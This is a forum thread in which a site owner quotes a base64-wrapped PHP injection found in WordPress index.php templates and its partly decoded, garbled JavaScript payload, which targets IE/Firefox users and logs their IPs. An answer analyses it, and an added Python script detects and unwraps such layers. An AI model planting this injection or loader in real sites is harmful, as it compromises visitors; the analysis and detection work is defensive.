WordPress malware injection in index.php template
2012-07-19 2 views
-1

Hello everyone, I recently discovered that this code had been injected into the index.php template file of every WordPress installation on my server: <?php eval(base64_decode('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'));?>

Normally a base64 decode is simple enough to deal with, but this one seems to have been encoded again.

What I get from base64-decoding it is:

$ip=$_SERVER["REMOTE_ADDR"];$dr=$_SERVER["DOCUMENT_ROOT"];$ua = $_SERVER['HTTP_USER_AGENT'];$dbf=$dr.'/'.md5($dr); 

if(((strpos($ua,'Windows')!==false)&&((strpos($ua,'MSIE')!==false)||(strpos($ua,'Firefox')!==false)))&&(strpos(@file_get_contents($dbf),$ip)===false)){ error_reporting(0);

if (x) {fr = "fromChar"; f = [0, -1,94,93,22,29,91,101,88,108] {try {1-prototype;} catch (asd) {x = 2; , 99,90101106359491105609890100919910710555112748694688610091293088100,91,111,28,32,81,37 84, 31, 112, -1,0, 38, 37, 89, 11, 101, 102, 97, 35, 100, 111, 93, 92, 95, 92, 95, 106, 50, 30, 39, 89,92,100481031011049610694102100478888104102981061079148999191107483750106100103483750,29,51,51,37,94, -1, -2,116,3, -2,092106101891059610199239591105879892104,29 , 32,113,2,0, -1, -2 , 109871032392215222891028910610091991073688105918610791589991989210010531299493104 , 86, 100, 91, 97, 82, 32, 109, , 98, 36, 98, 112, 102, 138, 37, 107, 104, 38, 53, 102, , 29,93,96,90899210028509235106106110999135103101104961069410210050308787106101971081069030499137105105,112 , 98, 90, 37, 98, 90, 103, 106, 50, 30, 38, 28, 50, , 94,89,107105923028110958910794283529383929305092351069110556106105105958710810690,31,29 , 93,92,95,92,95,1062835293839293050,3, -2,0, -1,89,102891061009199107369292106 , 58,99,91,98,92,10010510656110758792698798923028891018911229308238823787101103,91 , 99,91,57,93,96,98,89,31,92, w = f, s = [], r = String, z = ((w + w) i = 0, 569-5 + 5-i> 0, i + 1) {j = i, if (e) s = s + (x && f && 012 === 10) e (s);
if ($fp = @fopen($dbf , "a")){fputs($fp , $ip.'|'); fclose($fp);} 

}

Can you guys tell me what this malware does?

Thanks

Answers

0

I'll try to help by working out what the code does, which I take to be what you're asking. What I can decipher:

It creates a file in the document root with an md5'd name. This file records the IP of every visitor coming from a Windows system with Internet Explorer or Firefox installed.

I'm not sure what the hacker is after, but if they can get code into the file, they have FTP access and can access the newly created log file.
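For anyone cleaning up an infection of this shape (the question's eval(base64_decode(...)) wrapper and the answer's description of an md5-named drop file in the document root), here is a small triage script. It is an added example, not code from the post or from WordPress: it peels nested eval/base64 layers from a template file, reports which behaviours the decoded PHP contains, and computes the path DOCUMENT_ROOT/md5(DOCUMENT_ROOT) that the decoded payload would write its visitor log to, so an admin can check whether that file exists and remove it. The sample template, the payload stand-in and the path /var/www/html are constructed for the example; the regex names are my own.

```python
import base64
import hashlib
import re

# Constructed stand-in for the decoded payload: it keeps only the behaviours the
# post describes (UA check, REMOTE_ADDR, md5-named drop file, append) and nothing
# that would execute in a visitor's browser.
INNER_PAYLOAD = b"""$ip=$_SERVER["REMOTE_ADDR"];$dr=$_SERVER["DOCUMENT_ROOT"];
$ua=$_SERVER['HTTP_USER_AGENT'];$dbf=$dr.'/'.md5($dr);
if($fp=@fopen($dbf,"a")){fputs($fp,$ip.'|');fclose($fp);}"""


def wrap_eval(payload: bytes) -> str:
    """Wrap bytes the way the injected line in the question does."""
    return "<?php eval(base64_decode('%s'));?>" % base64.b64encode(payload).decode()


# Constructed sample template: a normal WordPress call followed by the injection,
# wrapped twice because the poster says the payload looked "encoded again".
SAMPLE_TEMPLATE = (
    "<?php get_header(); ?>\n"
    + wrap_eval(wrap_eval(INNER_PAYLOAD).encode())
    + "\n<div id=\"content\">...</div>\n"
)

EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)"
)

# Behaviour indicators drawn from the decoded code in the question (names are mine).
INDICATORS = {
    "logs_remote_addr": re.compile(r"\$_SERVER\s*\[\s*['\"]REMOTE_ADDR['\"]"),
    "checks_user_agent": re.compile(r"HTTP_USER_AGENT"),
    "md5_named_dropfile": re.compile(r"md5\s*\(\s*\$dr\s*\)"),
    "appends_to_file": re.compile(r"fopen\s*\([^)]*,\s*['\"]a['\"]"),
}


def unwrap_eval_layers(source: str, max_layers: int = 10):
    """Peel nested eval(base64_decode('...')) wrappers.

    Returns (layers, final_code): every decoded layer in order, and the innermost
    code that no longer contains the wrapper. Stops on undecodable base64."""
    layers = []
    current = source
    for _ in range(max_layers):
        m = EVAL_B64.search(current)
        if not m:
            break
        blob = re.sub(r"\s+", "", m.group(1))
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError subclass
            break
        layers.append(decoded)
        current = decoded
    return layers, current


def classify(source: str) -> dict:
    """Decode the wrapper(s) and list which known behaviours the payload contains."""
    layers, final = unwrap_eval_layers(source)
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(final))
    return {"eval_layers": len(layers), "indicators": hits, "decoded": final}


def expected_dropfile(document_root: str) -> str:
    """Path the payload writes its IP log to: DOCUMENT_ROOT . '/' . md5(DOCUMENT_ROOT).

    PHP's md5() of a string equals MD5 over its bytes, so this reproduces $dbf for a
    given document root (pass the exact string PHP would see, without a trailing slash)."""
    return document_root + "/" + hashlib.md5(document_root.encode()).hexdigest()


if __name__ == "__main__":
    result = classify(SAMPLE_TEMPLATE)
    print("eval/base64 layers peeled:", result["eval_layers"])
    print("behaviours found:", ", ".join(result["indicators"]) or "none")
    print("check for a dropped log at:", expected_dropfile("/var/www/html"))
```

Run it against each real index.php instead of the constructed sample (read the file and pass its text to classify), and if the returned drop-file path exists, keep a copy for the incident record before deleting it: the '|'-separated IPs inside are the visitors the injected code was tracking.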
